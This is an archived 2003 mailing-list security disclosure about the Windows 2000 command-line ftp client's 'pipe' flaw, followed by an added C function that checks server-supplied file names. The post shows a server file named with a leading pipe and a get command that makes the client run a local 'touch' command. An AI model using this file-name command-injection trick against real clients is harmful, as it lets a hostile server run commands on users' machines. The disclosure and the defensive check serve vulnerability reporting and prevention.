[Full-Disclosure] RE: Multiple Vendor FTP pipe Vulnerability
From: SChoe (schoe@oicinc.com)
Date: 02/25/03
From: SChoe <schoe@oicinc.com>
To: bugtraq@securityfocus.com
Date: Tue, 25 Feb 2003 12:22:21 -1000 (HST)
Oops. The "touch" syntax is wrong due to my lack of cut-n-paste skills.
touch \|touch\ file <--------Wrong
touch \|touch\ file.txt <--------Right
My bad...
On Tue, 25 Feb 2003, SChoe wrote:
> Date: Tue, 25 Feb 2003 12:17:50 -1000 (HST)
> From: SChoe <schoe@oicinc.com>
> To: bugtraq@securityfocus.com
> Cc: full-disclosure@lists.netsys.com
> Subject: RE: Multiple Vendor FTP pipe Vulnerability
>
> Securityfocus has a post on its website regarding this vulnerability in
> many ftp clients. I've tested and subsequently validated this issue on
> many of the platforms mentioned in their advisory. They mention
> the Netscape client on Windows 2000 Professional, but fail to
> mention that the commandline ftp client included with win2k (server and
> pro) is also vulnerable.
>
> <-----------------------snip----------------------->
> # Create file on ftp server for download by client.
> schoe@ftp:/home/ftp$ touch \|touch\ file
>
> # Start commandline ftp client on win2k.
> Microsoft Windows 2000 [Version 5.00.2195]
> <C> Copyright 1985-2000 Microsoft Corp.
>
> C:\ ftp ftp.xxxx.com
> ....
> ftp> get "|touch file.txt"
> ...
> ftp> quit
> 221 Goodbye.
>
> # "C:\file.txt" should now exist.
> <-----------------------snap----------------------->
>
> Multiple Vendor FTP pipe Vulnerability
> ======================================
> www.securityfocus.com/bid/396/info
.-------------------------------------------.
| Sung J. Choe <schoe[at]oicinc.com>, TICSA |
| Systems Admin, Facility Security Officer |
.-------------------------------------------.---.
| Oceanic Imaging Consultants, Inc. |
| Phone #: (808) 539.3634 |
.-----------------------------------.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
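
A client-side check for the behaviour shown in the message above, as an added example that is not part of the original post or of any vendor's ftp client. It assumes the classic BSD-derived ftp convention that a local file name beginning with "|" is run as a shell command and that "-" means standard input/output; the function and enum names are hypothetical.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Why a server-supplied name is refused as a local target (hypothetical names). */
enum name_verdict {
    NAME_OK = 0,
    NAME_EMPTY,
    NAME_PIPE,     /* leading '|': assumed to be passed to the shell by the client */
    NAME_STDIO,    /* "-": assumed to mean stdin/stdout in the client */
    NAME_PATH,     /* separator, drive letter colon, "." or ".." */
    NAME_CONTROL   /* control character such as an embedded newline */
};

/* Decide whether a name received from the server may be used unchanged
 * as the local file name in the current directory. */
enum name_verdict check_local_name(const char *name)
{
    size_t i, len;

    if (name == NULL || name[0] == '\0')
        return NAME_EMPTY;
    if (name[0] == '|')
        return NAME_PIPE;
    if (strcmp(name, "-") == 0)
        return NAME_STDIO;
    len = strlen(name);
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c < 0x20 || c == 0x7f)
            return NAME_CONTROL;
        if (c == '/' || c == '\\' || c == ':')
            return NAME_PATH;
    }
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return NAME_PATH;
    return NAME_OK;
}

int main(void)
{
    /* Constructed sample names; the first is the one used in the post. */
    const char *samples[] = { "|touch file.txt", "file.txt", "-", "..\\boot.ini" };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-18s verdict=%d\n", samples[i], (int)check_local_name(samples[i]));
    return 0;
}
```

A client would call this on every name returned by the server before deriving a local file name from it, and open accepted names with an ordinary file-open call, never a pipe-open call.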